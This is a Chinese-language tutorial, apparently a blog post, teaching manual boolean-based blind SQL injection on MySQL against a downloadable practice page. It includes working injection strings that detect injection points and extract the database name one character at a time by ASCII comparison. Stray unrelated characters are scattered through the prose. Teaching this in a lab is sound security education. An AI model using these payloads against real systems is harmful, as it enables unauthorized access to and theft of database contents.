此篇文章是建立在你已閱讀并掌握《Mysql 聯(lián)合查詢手工注入詳解》一文的基礎上
練習環(huán)境下載地址https://jianshu-lfbc.oss-cn-hangzhou.aliyuncs.com/Mysql%E5%B8%83%E5%B0%94%E5%9E%8B%E7%9B%B2%E6%B3%A8%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E8%AF%A6%E8%A7%A3/mysql%E5%B8%83%E5%B0%94%E5%9E%8B%E7%9B%B2%E6%B3%A8%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E7%BB%83%E4%B9%A0%E7%8E%AF%E5%A2%83.zip
0x00 什么叫布爾型盲注
布爾型
布爾(Boolean)型是計算機里的一種數(shù)據(jù)類型黍聂,只有True(真)和False(假)兩個值。一般也稱為邏輯型身腻。
盲注
在注入時頁面無具體數(shù)據(jù)返回的注入稱之為盲注产还,一般是通過其他表現(xiàn)形式來判斷數(shù)據(jù)的具體內(nèi)容
布爾型盲注
頁面在執(zhí)行sql語句后,只會顯示兩種結果嘀趟,這時可通過構造邏輯表達式的sql語句來判斷數(shù)據(jù)的具體內(nèi)容脐区。
是不是聽的云里霧里的,沒關系她按,繼續(xù)看
0x01 Mysql語法介紹
邏輯運算
傳送門 http://www.runoob.com/mysql/mysql-operator.html
length()
函數(shù)可返回字符串的長度
select length(database());
database()函數(shù)不用說了牛隅,會返回當前數(shù)據(jù)庫名稱炕柔,length()函數(shù)可返回一個字符串的長度,這里帶入的是database()媒佣,也就是實際返回的是test的長度
substring()
substring()函數(shù)可以截取字符串匕累,可指定開始的位置和截取的長度
select substring('test',1,3);
select substring('test',2,1);
ord()
ord()函數(shù)可以返回單個字符的ASCII碼
select substring(database(),1,1);
select ord(substring(database(),1,1));
反之,char()函數(shù)可將ASCII碼轉(zhuǎn)換為對應的字符
select char(116);
0x02 手工注入
判斷注入點
這里就不能像聯(lián)合查詢注入一樣根據(jù)頁面是否報錯判斷了默伍,因為sql執(zhí)行失敗和未查到數(shù)據(jù)都會返回False欢嘿,所以只能通過返回的邏輯值來判斷
/* 整型注入 */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* 字符型注入 */
sql-bool.php?name=user1' and '1'='1
sql-bool.php?name=user1' and '1'='2
/* 字符型注入 */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2
根據(jù)payload返回的成功或失敗可以判斷是否存在注入點,
拿整型注入舉個例子
如果帶入user1返回為存在(真)也糊,那么當存在整型注入時炼蹦,通過邏輯運算and(與)的關系,后面跟上1=1(恒真)狸剃,那么返回值也肯定為存在(真)掐隐,帶入1=2(恒假)時,那么返回值也肯定為不存在(假)
通過這種方式就可以判斷是否存在布爾型盲注
讀數(shù)據(jù)
由于盲注無法回顯钞馁,所以只能通過將獲取到的數(shù)據(jù)挨個字符截取虑省,然后再通過轉(zhuǎn)換為ASCII碼的方式與可見字符的ASCII值一一對比
這里以讀取當前數(shù)據(jù)庫名為例
/* 判斷庫名長度 */
sql-bool.php?name=user1' and (select length(database())) = 1 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 2 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 3 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 4 and '1'='1
當length(database())=4時,返回真指攒,也就是數(shù)據(jù)庫名的長度有4位
然后我們再一位一位的判斷字符內(nèi)容慷妙,由于mysql庫名不區(qū)分大小寫,且組成元素為26位英文字母允悦、數(shù)字和下劃線膝擂,所以只需要和這些字符的ASCII值進行比較
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 97 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 98 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 99 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 100 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 101 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 102 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 103 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 104 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 105 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 106 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 107 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 108 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 109 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 110 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 111 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 112 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 113 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 114 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 115 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 116 and '1'='1
當與其他ASCII值判斷時,返回均為假隙弛,與116判斷是否相等時架馋,返回為真,由此可判斷數(shù)據(jù)庫名第一個字符的ASCII值為116全闷,再通過ASCII轉(zhuǎn)換為字符叉寂,可得知當前數(shù)據(jù)庫名第一個字符內(nèi)容為't'
其他數(shù)據(jù)同樣是用相同的辦法讀取內(nèi)容
